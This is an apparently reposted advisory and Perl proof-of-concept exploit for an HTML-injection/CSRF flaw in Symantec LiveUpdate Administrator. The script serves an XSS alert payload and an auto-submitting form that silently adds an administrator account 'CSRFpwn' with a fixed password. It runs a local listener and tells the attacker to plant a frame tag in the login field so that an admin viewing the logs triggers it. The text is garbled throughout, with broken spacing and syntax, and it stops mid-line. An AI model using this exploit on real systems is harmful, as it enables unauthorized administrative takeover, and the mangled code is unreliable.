Symantec LiveUpdate is a technology Symantec uses to automatically update Symantec virus definitions and products. The LiveUpdate client is provided with each Symantec product and automatically installs. LiveUpdate regularly connects to the LiveUpdate server to check for new updates to Symantec products installed on your computer. The Symantec LiveUpdate Administrator page has the HTML injection vulnerability, which may cause cross-site scripting attacks or malicious HTML code injection.
[+] Info:
~~~~~~~~~
Symantec LiveUpdate Administrator Management gui html Injection
[+] Poc:
~~~~~~~~~
View sourceprint? 001 #! /Usr/bin/perl
002
003 ##
004 # Title: Symantec Live Update Administrator CSRF Exploit
005 # Name: luaCSRF. pl
006 # Author: Nikolas Sotiriu (lofi) <lofi [at] sotiriu.de>
007 #
008 # Use it only for education or ethical pentesting! The author accepts
009 # no liability for damage caused by this tool.
010 #
011 ##
012
013
014 use Socket;
015 use IO: Handle;
016 use Getopt: Std;
017
018 my % args;
019 getopt (g: h:, \ % args );
020
021 my $ payload = $ args {g} | usage ();
022 my $ victim = $ args {h} | usage ();
023
024 banner ();
025
026 if ($ payload eq "1 "){
027 print "[+] Using the Alert Box payload ";
028 # Alert Box
029 $ html = <ENDHTML;
030
031 <script language = "JavaScript"> alert (!!! XSS/CSRF vulnerability !!!) </SCRIPT>
032
033
034 ENDHTML
035
036} elsif ($ payload eq "2 "){
037 print "[+] Using the add admin user payload ";
038 # Adds the user CSRFpwn with password 12345678
039 $ html = <ENDHTML;
040
041 <body onload = "document. csrf. submit ();">
042 <form name = "csrf" action = "http: // $ victim: 7070/lua/adduser. do" method = "post">
043 <input type = "hidden" name = "dispatch" value = "save"/>
044 <input type = "hidden" name = "username" value = "CSRFpwn"/>
045 <input type = "hidden" name = "password" value = "12345678"/>
046 <input type = "hidden" name = "verifyPassword" value = "12345678"/>
047 <input type = "hidden" name = "lastname" value = "junk"/>
048 <input type = "hidden" name = "firstname" value = "junk"/>
049 <input type = "hidden" name = "email" value = "junk@junk.com"/>
050 <input type = "hidden" name = "userRole" value = "1"/>
051 </form>
052 </body>
053
054
055 ENDHTML
056
057}
058
059 my $ protocol = getprotobyname (tcp );
060
061 socket (SOCK, AF_INET, SOCK_STREAM, $ protocol) or die "[-] socket () failed: $! ";
062 setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "[-] Cant set SO_REUSEADDR: $! ";
063 my $ my_addr = sockaddr_in (80, INADDR_ANY );
064 bind (SOCK, $ my_addr) or die "[-] bind () failed: $! ";
065 listen (SOCK, SOMAXCONN) or die "[-] listen () failed: $! ";
066 warn "[+] waiting for incoming connections on port 80 ...";
067 warn "[+] Enter the following String in the LUA username login field ";
068 warn "[+] (e. q. HTTP/SSH) and wair for the admin to view the Logs ";
069 warn "[+]";
070 warn "[+] <frame src = http: // <LOCAL_ADDRESS>/. html> ";
071
072 $ repeat = 1;
073 $ victim = inet_aton ("0.0.0.0 ");
074 while ($ repeat ){
075 my $ remote_addr = accept (SESSION, SOCK );
076 my ($ port, $ hisaddr) = sockaddr_in ($ remote_addr );
077 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port]";
078 $ victim = $ hisaddr;
079 SESSION-> autoflush (1 );
080 if (<SESSION> ){
081 print SESSION $ http_header. $ html;
082}
083 warn "[+] Connection from [", inet_ntoa ($ hisaddr), ", $ port] finished ";
084 close SESSION;
085}
086
087 sub usage {
088 print $ payload;
089 print "";
090 print "luaCSRF. pl-Symantec lua csrf Exploit ";
091 print "========================================== ===================================== ";
092 print "Usage :";
093 print "$0-g <payload>-h <lua-ip> ";
094 print "Optional :";
095 print "-p <local port to listen on> ";
096 print "-g (1 | 2) <payload to use> ";
097 print "1 <Execute an alert box ";
098 print "2 <Add the Admin User" CSRFpwn "> ";
099 &